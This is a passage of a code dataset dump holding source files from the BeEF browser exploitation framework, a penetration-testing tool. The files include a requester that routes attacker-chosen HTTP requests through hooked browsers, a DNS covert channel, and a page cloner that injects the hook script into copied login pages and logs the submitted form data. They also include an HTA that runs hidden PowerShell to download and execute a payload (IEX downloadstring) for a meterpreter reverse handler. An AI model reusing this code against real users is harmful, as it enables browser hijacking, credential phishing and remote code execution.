language
stringlengths 0
24
| filename
stringlengths 9
214
| code
stringlengths 99
9.93M
|
---|---|---|
Ruby | beef/extensions/requester/api.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Requester
module RegisterHttpHandler
BeEF::API::Registrar.instance.register(BeEF::Extension::Requester::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
def self.mount_handler(beef_server)
beef_server.mount('/requester', BeEF::Extension::Requester::Handler)
beef_server.mount('/api/requester', BeEF::Extension::Requester::RequesterRest.new)
end
end
module RegisterPreHookCallback
BeEF::API::Registrar.instance.register(BeEF::Extension::Requester::RegisterPreHookCallback, BeEF::API::Server::Hook, 'pre_hook_send')
def self.pre_hook_send(hooked_browser, body, _params, _request, _response)
dhook = BeEF::Extension::Requester::API::Hook.new
dhook.requester_run(hooked_browser, body)
end
end
end
end
end |
YAML | beef/extensions/requester/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
extension:
requester:
name: 'Requester'
enable: false
authors: ["antisnatchor", "scotty"] |
Ruby | beef/extensions/requester/extension.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Requester
end
end
end
require 'extensions/requester/models/http'
require 'extensions/requester/api/hook'
require 'extensions/requester/handler'
require 'extensions/requester/api'
require 'extensions/requester/rest/requester' |
Ruby | beef/extensions/requester/handler.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Requester
#
# The http handler that manages the Requester.
#
class Handler
H = BeEF::Core::Models::Http
Z = BeEF::Core::Models::HookedBrowser
def initialize(data)
@data = data
setup
end
def setup
# validates the hook token
beef_hook = @data['beefhook'] || nil
if beef_hook.nil?
print_error 'beefhook is null'
return
end
# validates the request id
request_id = @data['cid'].to_s
if request_id == ''
print_error 'Original request id (command id) is null'
return
end
unless BeEF::Filters.nums_only?(request_id)
print_error 'Original request id (command id) is invalid'
return
end
# validates that a hooked browser with the beef_hook token exists in the db
zombie_db = Z.where(session: beef_hook).first || nil
if zombie_db.nil?
(print_error 'Invalid beefhook id: the hooked browser cannot be found in the database'
return)
end
# validates that we have such a http request saved in the db
http_db = H.where(id: request_id.to_i, hooked_browser_id: zombie_db.session).first || nil
if http_db.nil?
print_error 'Invalid http_db: no such request found in the database'
return
end
# validates that the http request has not been run before
if http_db.has_ran.eql? 'complete'
(print_error 'This http request has been saved before'
return)
end
# validates the response code
response_code = @data['results']['response_status_code'] || nil
if response_code.nil?
(print_error 'Http response code is null'
return)
end
# save the results in the database
http_db.response_headers = @data['results']['response_headers']
http_db.response_status_code = @data['results']['response_status_code']
http_db.response_status_text = @data['results']['response_status_text']
http_db.response_port_status = @data['results']['response_port_status']
http_db.response_data = @data['results']['response_data']
http_db.response_date = Time.now
http_db.has_ran = 'complete'
# Store images as binary
# see issue https://github.com/beefproject/beef/issues/449
http_db.response_data = http_db.response_data.unpack('a*') if http_db.response_headers =~ /Content-Type: image/
http_db.save
end
end
end
end
end |
Ruby | beef/extensions/requester/api/hook.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Requester
module API
require 'uri'
class Hook
include BeEF::Core::Handlers::Modules::BeEFJS
# If the HTTP table contains requests that need to be sent (has_ran = waiting), retrieve
# and send them to the hooked browser.
def requester_run(hb, body)
@body = body
# Generate all the requests and output them to the hooked browser
output = []
print_debug hb.to_json
BeEF::Core::Models::Http.where(hooked_browser_id: hb.session, has_ran: 'waiting').each do |h|
output << requester_parse_db_request(h)
end
return if output.empty?
config = BeEF::Core::Configuration.instance
ws = BeEF::Core::Websocket::Websocket.instance
evasion = BeEF::Extension::Evasion::Evasion.instance if config.get('beef.extension.evasion.enable')
# TODO: antisnatchor: prevent sending "content" multiple times.
# Better leaving it after the first run, and don't send it again.
# todo antisnatchor: remove this gsub crap adding some hook packing.
# If we use WebSockets, just reply wih the component contents
if config.get('beef.http.websocket.enable') && ws.getsocket(hb.session)
content = File.read(find_beefjs_component_path('beef.net.requester')).gsub('//
// Copyright (c) 2006-2023Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file \'doc/COPYING\' for copying permission
//', '')
add_to_body output
if config.get('beef.extension.evasion.enable')
ws.send(evasion.obfuscate(content) + @body, hb.session)
else
ws.send(content + @body, hb.session)
end
# if we use XHR-polling, add the component to the main hook file
else
build_missing_beefjs_components 'beef.net.requester'
# Send the command to perform the requests to the hooked browser
add_to_body output
end
end
def add_to_body(output)
config = BeEF::Core::Configuration.instance
req = %{
beef.execute(function() {
beef.net.requester.send(
#{output.to_json}
);
});
}
if config.get('beef.extension.evasion.enable')
evasion = BeEF::Extension::Evasion::Evasion.instance
@body << evasion.obfuscate(req)
else
@body << req
end
end
#
# Converts an HTTP db object into an Hash that follows the representation
# of input data for the beef.net.request Javascript API function.
# The Hash will then be converted into JSON, given as input to beef.net.requester.send Javascript API function
# and finally sent to and executed by the hooked browser.
def requester_parse_db_request(http_db_object)
allow_cross_domain = http_db_object.allow_cross_domain.to_s
verb = http_db_object.method.upcase
proto = http_db_object.proto.downcase
uri = http_db_object.request.split(/\s+/)[1]
headers = {}
req_parts = http_db_object.request.split(/\r?\n/)
@host = http_db_object.domain
@port = http_db_object.port
print_debug 'http_db_object:'
print_debug http_db_object.to_json
# @note: retrieve HTTP headers values needed later, and the \r\n that indicates the start of the post-data (if any)
req_parts.each_with_index do |value, index|
@content_length = Integer(req_parts[index].split(/:\s+/)[1]) if value.match(/^Content-Length:\s+(\d+)/)
@post_data_index = index if value.eql?('') || value.strip.empty? # this will be the CRLF (before HTTP request body)
end
# @note: add HTTP request headers to an Hash
req_parts.each_with_index do |value, index|
if verb.eql?('POST')
if index.positive? && (index < @post_data_index) # only add HTTP headers, not the verb/uri/version or post-data
header_key = value.split(/: /)[0]
header_value = value.split(/: /)[1]
headers[header_key] = header_value
end
elsif index.positive?
header_key = value.split(/: /)[0]
header_value = value.split(/: /)[1]
headers[header_key] = header_value # only add HTTP headers, not the verb/uri/version
end
end
# set default port if nil
if @port.nil?
@port = if uri.to_s =~ /^https?/
# absolute
uri.match(/^https:/) ? 443 : 80
else
# relative
proto.eql?('https') ? 443 : 80
end
end
# Build request
http_request_object = {
'id' => http_db_object.id,
'method' => verb,
'proto' => proto,
'host' => @host,
'port' => @port,
'uri' => uri,
'headers' => headers,
'allowCrossDomain' => allow_cross_domain
}
# Add POST request data
if !@content_length.nil? && @content_length.positive?
post_data_sliced = req_parts.slice(@post_data_index + 1, req_parts.length)
@post_data = post_data_sliced.join
http_request_object['data'] = @post_data
end
# @note: parse HTTP headers Hash, adding them to the object that will be used by beef.net.requester.send
headers.each_key { |key| http_request_object['headers'][key] = headers[key] }
print_debug 'result http_request_object'
print_debug http_request_object.to_json
http_request_object
end
end
end
end
end
end |
Ruby | beef/extensions/requester/models/http.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
#
# Table stores the http requests and responses from the requester.
#
class Http < BeEF::Core::Model
#
# Removes a request/response from the data store
#
def self.delete(id)
if id.to_s !~ /\A\d+\z/
(print_error 'Failed to remove response. Invalid response ID.'
return)
end
r = BeEF::Core::Models::Http.find(id.to_i)
if r.nil?
(print_error "Failed to remove response [id: #{id}]. Response does not exist."
return)
end
r.destroy
end
end
end
end
end |
Ruby | beef/extensions/requester/rest/requester.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module Requester
# This class handles the routing of RESTful API requests for the requester
class RequesterRest < BeEF::Core::Router::Router
# Filters out bad requests before performing any routing
before do
config = BeEF::Core::Configuration.instance
# Require a valid API token from a valid IP address
halt 401 unless params[:token] == config.get('beef.api_token')
halt 403 unless BeEF::Core::Rest.permitted_source?(request.ip)
H = BeEF::Core::Models::Http
HB = BeEF::Core::Models::HookedBrowser
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# Returns a request by ID
get '/request/:id' do
id = params[:id]
raise InvalidParamError, 'id' unless BeEF::Filters.nums_only?(id)
requests = H.find(id)
halt 404 if requests.nil?
result = {}
result[:count] = requests.length
result[:requests] = []
requests.each do |request|
result[:requests] << request2hash(request)
end
result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while retrieving request with id #{id} (#{e.message})"
halt 500
end
# Returns all requestes given a specific hooked browser id
get '/requests/:id' do
id = params[:id]
raise InvalidParamError, 'id' unless BeEF::Filters.is_valid_hook_session_id?(id)
requests = H.where(hooked_browser_id: id)
halt 404 if requests.nil?
result = {}
result[:count] = requests.length
result[:requests] = []
requests.each do |request|
result[:requests] << request2hash(request)
end
result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while retrieving request list for hooked browser with id #{id} (#{e.message})"
halt 500
end
# Return a response by ID
get '/response/:id' do
# super debugging
error = {}
error[:code] = 0
id = params[:id]
raise InvalidParamError, 'id' unless BeEF::Filters.nums_only?(id)
error[:code] = 1
responses = H.find(id) || nil
error[:code] = 2
halt 404 if responses.nil?
error[:code] = 3
result = {}
result[:success] = 'true'
error[:code] = 4
result[:result] = response2hash(responses)
error[:code] = 5
result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while retrieving response with id #{id} (#{e.message})"
error[:id] = id
error[:message] = e.message
error.to_json
# halt 500
end
# Deletes a specific response given its id
delete '/response/:id' do
id = params[:id]
raise InvalidParamError, 'id' unless BeEF::Filters.nums_only?(id)
responses = H.find(id) || nil
halt 404 if responses.nil?
result = {}
result['success'] = H.delete(id)
result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while removing response with id #{id} (#{e.message})"
halt 500
end
# Send a new HTTP request to the hooked browser
post '/send/:id' do
id = params[:id]
proto = params[:proto].to_s || 'http'
raw_request = params['raw_request'].to_s
zombie = HB.where(session: id).first || nil
halt 404 if zombie.nil?
# @TODO: move most of this to the model
raise InvalidParamError, 'raw_request' if raw_request == ''
raise InvalidParamError, 'raw_request: Invalid request URL scheme' if proto !~ /\Ahttps?\z/
req_parts = raw_request.split(/ |\n/)
verb = req_parts[0]
raise InvalidParamError, 'raw_request: Only HEAD, GET, POST, OPTIONS, PUT or DELETE requests are supported' unless BeEF::Filters.is_valid_verb?(verb)
uri = req_parts[1]
raise InvalidParamError, 'raw_request: Invalid URI' unless BeEF::Filters.is_valid_url?(uri)
version = req_parts[2]
raise InvalidParamError, 'raw_request: Invalid HTTP version' unless BeEF::Filters.is_valid_http_version?(version)
host_str = req_parts[3]
raise InvalidParamError, 'raw_request: Invalid HTTP version' unless BeEF::Filters.is_valid_host_str?(host_str)
# Validate target hsot
host = req_parts[4]
host_parts = host.split(/:/)
host_name = host_parts[0]
host_port = host_parts[1] || nil
raise InvalidParamError, 'raw_request: Invalid HTTP HostName' unless BeEF::Filters.is_valid_hostname?(host_name)
host_port = host_parts[1] || nil
if host_port.nil? || !BeEF::Filters.nums_only?(host_port)
host_port = proto.eql?('https') ? 443 : 80
end
# Save the new HTTP request
http = H.new(
hooked_browser_id: zombie.session,
request: raw_request,
method: verb,
proto: proto,
domain: host_name,
port: host_port,
path: uri,
request_date: Time.now,
allow_cross_domain: 'true'
)
print_debug "added new http request for #{zombie.session}"
print_debug http.to_json
if verb.eql?('POST') || verb.eql?('PUT')
req_parts.each_with_index do |value, index|
http.content_length = req_parts[index + 1] if value.match(/^Content-Length/i)
end
end
http.save
result = request2hash(http)
print_debug "[Requester] Sending HTTP request through zombie [ip: #{zombie.ip}] : #{result}"
# result.to_json
rescue InvalidParamError => e
print_error e.message
halt 400
rescue StandardError => e
print_error "Internal error while removing network host with id #{id} (#{e.message})"
halt 500
end
# Convert a request object to Hash
def request2hash(http)
{
id: http.id,
proto: http.proto,
domain: http.domain,
port: http.port,
path: http.path,
has_ran: http.has_ran,
method: http.method,
request_date: http.request_date,
response_date: http.response_date,
response_status_code: http.response_status_code,
response_status_text: http.response_status_text,
response_port_status: http.response_port_status
}
end
# Convert a response object to Hash
def response2hash(http)
response_data = ''
unless http.response_data.nil?
if (http.response_data.length > (1024 * 100)) # more than 100K
response_data = http.response_data[0..(1024 * 100)]
response_data += "\n<---------- Response Data Truncated---------->"
else
response_data = http.response_data
end
end
response_headers = ''
response_headers = http.response_headers unless http.response_headers.nil?
{
id: http.id,
request: http.request.force_encoding('UTF-8'),
response: response_data.force_encoding('UTF-8'),
response_headers: response_headers.force_encoding('UTF-8'),
proto: http.proto.force_encoding('UTF-8'),
domain: http.domain.force_encoding('UTF-8'),
port: http.port.force_encoding('UTF-8'),
path: http.path.force_encoding('UTF-8'),
date: http.request_date,
has_ran: http.has_ran.force_encoding('UTF-8')
}
end
# Raised when invalid JSON input is passed to an /api/requester handler.
class InvalidJsonError < StandardError
DEFAULT_MESSAGE = 'Invalid JSON input passed to /api/requester handler'.freeze
def initialize(message = nil)
super(message || DEFAULT_MESSAGE)
end
end
# Raised when an invalid named parameter is passed to an /api/requester handler.
class InvalidParamError < StandardError
DEFAULT_MESSAGE = 'Invalid parameter passed to /api/requester handler'.freeze
def initialize(message = nil)
str = 'Invalid "%s" parameter passed to /api/requester handler'
message = format str, message unless message.nil?
super(message)
end
end
end
end
end
end |
Ruby | beef/extensions/s2c_dns_tunnel/api.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module ServerClientDnsTunnel
module API
module ServerClientDnsTunnelHandler
BeEF::API::Registrar.instance.register(BeEF::Extension::ServerClientDnsTunnel::API::ServerClientDnsTunnelHandler,
BeEF::API::Server, 'pre_http_start')
BeEF::API::Registrar.instance.register(BeEF::Extension::ServerClientDnsTunnel::API::ServerClientDnsTunnelHandler,
BeEF::API::Server, 'mount_handler')
# Starts the S2C DNS Tunnel server at BeEF startup.
# @param http_hook_server [BeEF::Core::Server] HTTP server instance
def self.pre_http_start(_http_hook_server)
configuration = BeEF::Core::Configuration.instance
zone = configuration.get('beef.extension.s2c_dns_tunnel.zone')
raise ArgumentError, 'zone name is undefined' unless zone.to_s != ''
# if listen parameter is not defined in the config.yaml then interface with the highest BeEF's IP-address will be choosen
listen = configuration.get('beef.extension.s2c_dns_tunnel.listen')
Socket.ip_address_list.map { |x| listen = x.ip_address if x.ipv4? } if listen.to_s.empty?
port = 53
protocol = :udp
interfaces = [[protocol, listen, port]]
dns = BeEF::Extension::ServerClientDnsTunnel::Server.instance
dns.run(listen: interfaces, zone: zone)
print_info "Server-to-Client DNS Tunnel Server: #{listen}:#{port} (#{protocol})"
info = ''
info += "Zone: #{zone}\n"
print_more info
end
# Mounts the handler for processing HTTP image requests.
# @param beef_server [BeEF::Core::Server] HTTP server instance
def self.mount_handler(beef_server)
configuration = BeEF::Core::Configuration.instance
zone = configuration.get('beef.extension.s2c_dns_tunnel.zone')
beef_server.mount('/tiles', BeEF::Extension::ServerClientDnsTunnel::Httpd.new(zone))
end
end
end
end
end
end |
YAML | beef/extensions/s2c_dns_tunnel/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
extension:
s2c_dns_tunnel:
enable: false
name: 'Server-to-Client DNS Tunnel'
authors: ['dnkolegov','afr1ka']
# Define which network interface DNS server should listen. IP-address of this interface will be used in DNS answers.
# By default, DNS server will be started on the interface which has a highest IP-address and will listen UDP 53 port only.
# listen: ''
# Zone managed by DNS server. DNS server will not be started if zone is not specified
zone: '' |
Ruby | beef/extensions/s2c_dns_tunnel/dnsd.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module ServerClientDnsTunnel
module RubyDNS
class Transaction
def fail!(rcode, domain)
append_question!
@answer.rcode = if rcode.is_a? Symbol
Resolv::DNS::RCode.const_get(rcode)
else
rcode.to_i
end
return unless rcode == :NXDomain
@answer.aa = 1
soa = Resolv::DNS::Resource::IN::SOA.new(Resolv::DNS::Name.create("ns.#{domain}"),
Resolv::DNS::Name.create("hostmaster.#{domain}"),
Time.now.strftime('%Y%m%d%H').to_i, 86_400, 7200, 3_600_000, 172_800)
@answer.add_authority(name, 3600, soa)
end
end
end
class Server < RubyDNS::Server
include Singleton
attr_accessor :messages
def initialize
super()
@lock = Mutex.new
end
# Starts the custom DNS server.
#
# @param options [Hash] server configuration options
# @option options [Array<Array>] :zone - zone manged by BeEF DNS server for data exfiltration
# @option options [Array<Array>] :listen - local interfaces to listen on
def run(options = {})
@lock.synchronize do
Thread.new do
EventMachine.next_tick do
listen = options[:listen] || nil
super(listen: listen)
@selfip = options[:listen][0][1]
@zone = options[:zone]
@messages = {}
end
end
end
end
# Entry point for processing incoming DNS requests.
#
# @param name [String] name of the resource record being looked up
# @param resource [Resolv::DNS::Resource::IN] query type (e.g. A, CNAME, NS, etc.)
# @param transaction [RubyDNS::Transaction] internal RubyDNS class detailing DNS question/answer
def process(name, resource, transaction)
@lock.synchronize do
print_debug "Received DNS request (name: #{name} type: #{format_resource(resource)})"
if (format_resource(resource) != 'A') || !name.match(/#{@zone}$/)
transaction.fail!(:Refused, @zone)
return
end
# Parce query name in accordance with Active Directory SRV resource records
cid = name.split('.')[2].split('-')[2].to_i
bit = name.split('.')[2].split('-')[3].to_i(16)
if @messages[cid].nil?
transaction.fail!(:NXDomain, @zone)
return
else
message = @messages[cid]
end
if message.length <= bit
transaction.fail!(:NXDomain, @zone)
return
end
# If the bit is equal to 1 we should return one of the BeEF's IP addresses
case message[bit]
when '1'
transaction.respond!(@selfip)
return
# If the bit is equal to 0 we should return NXDomain message
when '0'
transaction.fail!(:NXDomain, @zone)
return
end
end
end
private
# Helper method that formats the given resource class in a human-readable format.
#
# @param resource [Resolv::DNS::Resource::IN] resource class
# @return [String] resource name stripped of any module/class names
def format_resource(resource)
/::(\w+)$/.match(resource.name)[1]
end
end
end
end
end |
Ruby | beef/extensions/s2c_dns_tunnel/extension.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module ServerClientDnsTunnel
extend BeEF::API::Extension
@short_name = 'S2C DNS Tunnel'
@full_name = 'Server-to-Client DNS Tunnel'
@description = 'This extension provides a custom BeEF DNS server and HTTP server ' \
'that implement unidirectional covert timing channel from BeEF communication server to zombie browser.'
end
end
end
require 'extensions/s2c_dns_tunnel/dnsd'
require 'extensions/s2c_dns_tunnel/api'
require 'extensions/s2c_dns_tunnel/httpd' |
Ruby | beef/extensions/s2c_dns_tunnel/httpd.rb | module BeEF
module Extension
module ServerClientDnsTunnel
class Httpd < Sinatra::Base
def initialize(domain)
super()
@domain = domain
end
get '/map' do
if request.host.match("^_ldap\._tcp\.[0-9a-z\-]+\.domains\._msdcs\.#{@domain}$")
path = File.dirname(__FILE__)
send_file File.join(path, 'pixel.jpg')
end
end
end
end
end
end
require 'sinatra/base' |
YAML | beef/extensions/social_engineering/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
extension:
social_engineering:
enable: false
name: 'Social Engineering'
authors: ["antisnatchor"]
web_cloner:
# NOTE: you must have 'wget' in your PATH
add_beef_hook: true
user_agent: "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2"
verify_ssl: true
powershell:
# the default payload being used is windows/meterpreter/reverse_https
msf_reverse_handler_host: "172.16.45.1"
msf_reverse_handler_port: "443"
powershell_handler_url: "/ps" |
Ruby | beef/extensions/social_engineering/extension.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module RegisterSEngHandler
def self.mount_handler(server)
server.mount('/api/seng', BeEF::Extension::SocialEngineering::SEngRest.new)
ps_url = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.powershell_handler_url')
server.mount(ps_url.to_s, BeEF::Extension::SocialEngineering::Bind_powershell.new)
end
end
module SocialEngineering
extend BeEF::API::Extension
@short_name = 'social_engineering'
@full_name = 'Social Engineering'
@description = 'Web page cloner and other social engineering tools.'
BeEF::API::Registrar.instance.register(BeEF::Extension::RegisterSEngHandler, BeEF::API::Server, 'mount_handler')
end
end
end
# Handlers
require 'extensions/social_engineering/web_cloner/web_cloner'
require 'extensions/social_engineering/web_cloner/interceptor'
require 'extensions/social_engineering/powershell/bind_powershell'
# Models
require 'extensions/social_engineering/models/web_cloner'
require 'extensions/social_engineering/models/interceptor'
# RESTful api endpoints
require 'extensions/social_engineering/rest/socialengineering' |
Text | beef/extensions/social_engineering/droppers/readme.txt | This directory will contain the droppers (executables, JARs, browser extensions, etc..)
that you want to have available on the BeEF server.
For example, if you want to have bin.exe available at http://beefserver/bin.exe,
use the following RESTful API call:
curl -H "Content-Type: application/json; charset=UTF-8" -d
'{"mount":"/bin.exe", "local_file":"/extensions/social_engineering/droppers/bin.exe"}'
-X POST http://beefserver/api/server/bind?token=<token> |
Ruby | beef/extensions/social_engineering/models/interceptor.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
class Interceptor < BeEF::Core::Model
belongs_to :webcloner
end
end
end
end |
Ruby | beef/extensions/social_engineering/models/web_cloner.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
class WebCloner < BeEF::Core::Model
has_many :interceptors
end
end
end
end |
Ruby | beef/extensions/social_engineering/powershell/bind_powershell.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module SocialEngineering
#
# By default powershell will be served from http://beef_server:beef_port/ps/ps.png
#
# NOTE: make sure you change the 'beef.http.public' settings in the main BeEF config.yaml to the public IP address / hostname for BeEF,
# and also the powershell-related variable in extensions/social_engineering/config.yaml,
# and also write your PowerShell payload to extensions/social_engineering/powershell/powershell_payload.
class Bind_powershell < BeEF::Core::Router::Router
before do
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# serves the HTML Application (HTA)
get '/hta' do
response['Content-Type'] = 'application/hta'
@config = BeEF::Core::Configuration.instance
beef_url_str = @config.beef_url_str
ps_url = @config.get('beef.extension.social_engineering.powershell.powershell_handler_url')
payload_url = "#{beef_url_str}#{ps_url}/ps.png"
print_info "Serving HTA. Powershell payload will be retrieved from: #{payload_url}"
"<script>
var c = \"cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c \\\"\\\"IEX ((new-object net.webclient).downloadstring('#{payload_url}')); Invoke-ps\\\"\\\"\";
new ActiveXObject('WScript.Shell').Run(c);
</script>"
end
# serves the powershell payload after modifying LHOST/LPORT
# The payload gets served via HTTP by default. Serving it via HTTPS it's still a TODO
get '/ps.png' do
response['Content-Type'] = 'text/plain'
@ps_lhost = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.msf_reverse_handler_host')
@ps_port = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.msf_reverse_handler_port')
ps_payload_path = "#{$root_dir}/extensions/social_engineering/powershell/powershell_payload"
if File.exist?(ps_payload_path)
return File.read(ps_payload_path).to_s.gsub('___LHOST___', @ps_lhost).gsub('___LPORT___', @ps_port)
end
nil
end
end
end
end
end |
Ruby | beef/extensions/social_engineering/rest/socialengineering.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module SocialEngineering
class SEngRest < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 unless BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# Example: curl -H "Content-Type: application/json; charset=UTF-8" -d json_body
# -X POST http://127.0.0.1:3000/api/seng/clone_page?token=851a937305f8773ee82f5259e792288cdcb01cd7
#
# Example json_body:
# {
# "url": "https://accounts.google.com/ServiceLogin?service=mail&continue=https://mail.google.com/mail/"
# "mount": "/gmail",
# "dns_spoof": true
# }
post '/clone_page' do
request.body.rewind
begin
body = JSON.parse request.body.read
uri = body['url']
mount = body['mount']
use_existing = body['use_existing']
dns_spoof = body['dns_spoof']
if !uri.nil? && !mount.nil?
if (uri =~ URI::DEFAULT_PARSER.make_regexp).nil? # invalid URI
print_error 'Invalid URI'
halt 401
end
unless mount[%r{^/}] # mount needs to start with /
print_error 'Invalid mount (need to be a relative path, and start with / )'
halt 401
end
web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance
success = web_cloner.clone_page(uri, mount, use_existing, dns_spoof)
if success
result = {
'success' => true,
'mount' => mount
}.to_json
else
result = {
'success' => false
}.to_json
halt 500
end
end
rescue StandardError
print_error 'Invalid JSON input passed to endpoint /api/seng/clone_page'
error 400 # Bad Request
end
end
end
end
end
end |
Ruby | beef/extensions/social_engineering/web_cloner/interceptor.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module SocialEngineering
require 'sinatra/base'
class Interceptor < Sinatra::Base
configure do
set :show_exceptions, false
end
# intercept GET
get '/' do
print_info "GET request from IP #{request.ip}"
print_info "Referer: #{request.referer}"
cloned_page = settings.cloned_page
cloned_page
end
# intercept POST
post '/' do
print_info "POST request from IP #{request.ip}"
request.body.rewind
data = request.body.read
print_info 'Intercepted data:'
print_info data
interceptor_db = BeEF::Core::Models::Interceptor.new(
webcloner_id: settings.db_entry.id,
post_data: data,
ip: request.ip
)
interceptor_db.save
if settings.frameable
print_info 'Page can be framed :-) Loading original URL into iFrame...'
"<html><head><script type=\"text/javascript\" src=\"#{settings.beef_hook}\"></script>\n</head></head><body><iframe src=\"#{settings.redirect_to}\" style=\"border:none; background-color:white; width:100%; height:100%; position:absolute; top:0px; left:0px; padding:0px; margin:0px\"></iframe></body></html>"
else
print_info 'Page can not be framed :-) Redirecting to original URL...'
redirect settings.redirect_to
end
end
end
end
end
end |
Ruby | beef/extensions/social_engineering/web_cloner/web_cloner.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module SocialEngineering
class WebCloner
require 'socket'
include Singleton
def initialize
@http_server = BeEF::Core::Server.instance
@config = BeEF::Core::Configuration.instance
@cloned_pages_dir = "#{File.expand_path('../../../extensions/social_engineering/web_cloner', __dir__)}/cloned_pages/"
@beef_hook = @config.hook_url.to_s
end
def clone_page(url, mount, use_existing, dns_spoof)
print_info "Cloning page at URL #{url}"
uri = URI(url)
output = uri.host
output_mod = "#{output}_mod"
user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
success = false
# Sometimes pages use Javascript/custom logic to submit forms. In these cases even having a powerful parser,
# there is no need to implement the complex logic to handle all different cases.
# We want to leave the task to modify the xxx_mod file to the BeEF user, and serve it through BeEF after modification.
# So ideally, if the the page needs custom modifications, the web_cloner usage will be the following:
# 1th request. {"uri":"http://example.com", "mount":"/"} <- clone the page, and create the example.com_mod file
# - the user modify the example.com_mod file manually
# 2nd request. {"uri":"http://example.com", "mount":"/", "use_existing":"true"} <- serve the example.com_mod file
#
if use_existing.nil? || use_existing == false
begin
cmd = ['wget', url.to_s, '-c', '-k', '-O', (@cloned_pages_dir + output).to_s, '-U', user_agent.to_s, '--read-timeout', '60', '--tries', '3']
cmd << '--no-check-certificate' unless @config.get('beef.extension.social_engineering.web_cloner.verify_ssl')
print_debug "Running command: #{cmd.join(' ')}"
IO.popen(cmd, 'r+') do |wget_io|
end
success = true
rescue Errno::ENOENT
print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
rescue StandardError => e
print_error "Errors executing wget: #{e}"
end
if success
File.open((@cloned_pages_dir + output_mod).to_s, 'w') do |out_file|
File.open((@cloned_pages_dir + output).to_s, 'r').each do |line|
